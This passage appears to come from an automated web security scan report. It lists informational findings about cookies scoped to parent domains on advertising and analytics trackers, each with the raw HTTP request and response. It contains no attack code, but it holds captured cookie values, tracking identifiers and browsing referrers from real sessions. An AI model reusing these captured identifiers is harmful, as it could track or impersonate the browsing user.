GET /HG?hc=&hb=DM560815NFZA93EN3&cd=1&hv=6&n=/Fixed+network+Phones&con=&vcon=/OS_Festnetz/OS_Telefone/OS_Festnetz&tt=none&ja=y&dt=13&zo=300&lm=1303689087000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=http%3A//en.swisscom.ch/residential&pl=Shockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.240.7%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AChrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AWPI%20Detector%201.3%3AGoogle%20Update%3ADefault%20Plug-in%3A&lv.id=&lv.pos=&hid=0.14724937756545842 HTTP/1.1
Host: ehg-swisscom.hitbox.com
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%XrXQ@eX%X; CTG=1303576541

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:40 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560815NFZAV6=V1^X(#X"rz%XrXe@%%erierB@Qz%zrzr"%XrXe@%%erz%XrXe@%%er"%XrXe@%%er"%XrXe@%%erierB@Q"rz(xB$<}xQ$$aFfTafUxB$<}xQ$8a~a7:TaxB$<}xQ$$aFfTafUxB$$2Ka_xBrTafk:hdxBrYO:TaFz7}z)OuKr6@@zA6<}v$aFfTafU6<}v8a~a7:Ta6<}v$aFfTafU6$2Ka_HTafk:hdHYO:TaFzOffGxXjxB$xB$aTxB(Fk2FFc:mxB(cOxB$haF2_aTf2I~; path=/; domain=ehg-swisscom.hitbox.com; expires=Mon, 23-Apr-2012 18:52:40 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrXe@%%er; path=/; domain=.hitbox.com; expires=Mon, 23-Apr-2012 18:52:40 GMT; max-age=31536000
Set-Cookie: CTG=1303671160; path=/; domain=.hitbox.com; expires=Sun, 01-May-2011 18:52:40 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 24 Apr 2011 18:52:41 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

17.87. http://ehg-swisscom.hitbox.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-swisscom.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM560815NFZA93EN3&cd=1&hv=6&n=blank&con=&vcon=/OS_Festnetz/OS_Telefone/OS_Festnetz/1000299810&tt=none&ja=y&dt=13&zo=300&lm=1303671368000&ce=n&ss=1920*1200&sc=16&sv=15&cy=lan&hp=y&ln=en-us&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=&lv.id=&lv.pos=&hid=0.19698849324288375 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ehg-swisscom.hitbox.com
Cookie: CTG=1303671357

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:55:58 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560815NFZAV6=V1^X(#X"rz%XrXe@%XQiierer@z%zrzr"%XrXe@%XQiz%XrXe@%XQi"%XrXe@%XQi"%XrXe@%XQiierer@"rz(xB$<}xQ$$aFfTafUxB$<}xQ$8a~a7:TaxB$<}xQ$$aFfTafUxB$%rrrB^^i%rxB$u~ITdz7}z)OuKr6%%BzA6<}v$aFfTafU6<}v8a~a7:Ta6<}v$aFfTafU6%rrrB^^i%r6u~ITdzu::dmIhd; path=/; domain=ehg-swisscom.hitbox.com; expires=Mon, 23-Apr-2012 18:55:58 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrXe@%XQi; path=/; domain=.hitbox.com; expires=Mon, 23-Apr-2012 18:55:58 GMT; max-age=31536000
Set-Cookie: CTG=1303671358; path=/; domain=.hitbox.com; expires=Sun, 01-May-2011 18:55:58 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 24 Apr 2011 18:55:59 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

17.88. http://equfx.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equfx.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=089&tax=search HTTP/1.1
Host: equfx.netmng.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CVnJm2nQviGpaZgoGV9njty5dIKdTca7cnNRAhZgA7bUbQnOUYrA7QBTQboME7kIs19d0OlmuCnEeS5N%2BBoSear2lfgsSwBvum2xekwmZoirZuJ4TXW2WJtuCxf1Pp6ICIBk9N%2FoTrTdf3BCWsu823ZkyUJT7dLxvLsz0w3DIGnrdxoSNhm6xM%2FE9JbrlmDUWUcuxr1W8xHYYCCPmO5uHdnaoIVbKtmx2uYNLFduONvRvhMR46uJ4OnjnsgS460tRM3axEGKfL%2Fwm%2BuXWLQDQwgQ4%2F0HN%2B81ajfaXCwGP3na8atr8q00NzqmcJWES426PY6CkoksWs82sE4ogKqAdyA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:40 GMT
Server: Apache/2.2.9
P3P: policyref="http://equfx.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Fri, 22 Apr 2011 19:44:40 GMT
Last-Modified: Fri, 22 Apr 2011 19:44:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=z2r8aytrpwakd%7CaX1f%2BX%2FH0XmnewULrgjFuBdyNO5Bfd3pDQ5D3BffaKygm7dWhxyfMeptI88DhCWPCMieuKmcL2x7c%2BH19wRjGU6WMC%2Fj5YTTPSS3NzPOIqDufmtYKfD%2Fi7sByDhAGs4OaaGcL4fkM8ToE%2B1SbyyQPiv4JgRuJqgqvzAT0PhUc2Qq%2FA2FuWNxwCQiehpdqupOwMrOGkuNMKcb6Y%2BAaCdn6sjXowEdBlDwqn1M5yyByn0Mo2yD2HaLuUD5MWy4CYKI6X7QwffnTgfB6NG4hGmbw6tDbDL4x7rpuRd4CBCv9vA%3D; expires=Mon, 24-Oct-2011 19:44:40 GMT; path=/; domain=.netmng.com
Content-Length: 618
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://ad.trafficmp.com/a/bpix?adv=1470&id=1&r='; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.body.appendChild(i);
var i=document.
...[SNIP]...

17.89. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activityi;src=2716759;type=eclan538;cat=eclan575;ord='%20+%20a%20+%20'? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fls.doubleclick.net

Response

HTTP/1.1 302 Found
Set-Cookie: test_cookie=CheckForPermission; expires=Sun, 24-Apr-2011 20:09:46 GMT; path=/; domain=.doubleclick.net
Location: /activityi;src=2716759;type=eclan538;cat=eclan575;ord='%20+%20a%20+%20'?&_dc_ck=try
Date: Sun, 24 Apr 2011 19:54:46 GMT
Content-Type: text/html; charset=UTF-8
Server: Floodlight server
Content-Length: 292
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="/activityi;src=2716759;type=ecla
...[SNIP]...

17.90. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1027338450/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1027338450/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1027338450/?random=1303691757847&cv=6&fst=1303691757847&num=1&fmt=3&value=0&label=2I9kCNjXnwEQ0uHv6QM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 00:35:47 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 25-Apr-2011 00:50:47 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

17.91. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1040833525/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1040833525/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1040833525/?random=1303693568529&cv=6&fst=1303693568529&num=1&fmt=3&value=0&label=Mdc0CIOO1wEQ9ben8AM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 01:36:45 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 25-Apr-2011 01:51:45 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

17.92. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072108379/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1072108379/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1072108379/?random=1303692848426&cv=6&fst=1303692848426&num=1&fmt=3&value=0&label=J2jSCPzy3gEQ26ac_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 00:53:58 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 25-Apr-2011 01:08:58 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

17.93. http://hellometro.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hellometro.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=27851 HTTP/1.1
Host: hellometro.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviRlXVgA-; Domain=.intellitxt.com; Expires=Thu, 23-Jun-2011 20:00:30 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviRlXVgA-; Domain=.intellitxt.com; Expires=Thu, 23-Jun-2011 20:00:30 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 20:00:30 GMT
Age: 0
Connection: keep-alive
Content-Length: 11704

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...

17.94. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM#DUE%oZDSFs[C#jT6#4fpHXSw^4MSkbcW^kJHs5vG[(l?%GK2v+wIbLRbZpJZPWPCtBpj(f-%Uqi+C`pFa#KCPN5<uj90t1PzS3+VX?C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Khs:Q'WOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9`o?G(j89; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 12:29:23 GMT
Content-Length: 1505

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAA
...[SNIP]...

17.95. http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zY